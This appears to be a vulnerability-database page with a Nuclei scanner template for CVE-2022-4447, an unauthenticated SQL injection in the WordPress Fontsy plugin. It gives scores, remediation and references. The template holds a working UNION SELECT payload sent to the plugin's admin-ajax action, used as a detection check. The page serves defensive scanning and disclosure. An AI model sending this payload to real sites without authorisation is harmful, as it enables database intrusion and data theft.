Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-4447HistoryJan 14, 2023 - 5:54 a.m.
WordPress Fontsy <=1.8.6 - SQL Injection
2023-01-1405:54:28
ProjectDiscovery
github.com
11
wordpress
fontsy
sql injection
vulnerability
update
sqli
unauth
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.088
Percentile
94.7%
WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-4447
info:
name: WordPress Fontsy <=1.8.6 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.
reference:
- https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad
- https://wordpress.org/plugins/fontsy/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4447
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/cyllective/CVEs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4447
cwe-id: CWE-89
epss-score: 0.04713
epss-percentile: 0.92631
cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: fontsy_project
product: fontsy
framework: wordpress
tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project
variables:
num: "999999999"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "{{md5(num)}}")'
condition: and
# digest: 4a0a00473045022021766a949cd8ce92eba5417c3955b72e5125cbeb4e851636eb75685f6d0fb24c022100c54171ad7da1e1f3267551cb193282182c18b7e80504d734197d6dd16b8b5d1f:922c64590222798bb761d5b6d8e72950Related
wpexploit
wpexploit
Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi
2022-12-21 00:00:00
cve
cve
CVE-2022-4447
2023-01-16 16:15:11
wpvulndb
wpvulndb
Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi
2022-12-21 00:00:00
cvelist
cvelist
CVE-2022-4447 Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi
2023-01-16 15:38:06
nvd
nvd
CVE-2022-4447
2023-01-16 16:15:11
prion
prion
Sql injection
2023-01-16 16:15:00
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.088
Percentile
94.7%
Related for NUCLEI:CVE-2022-4447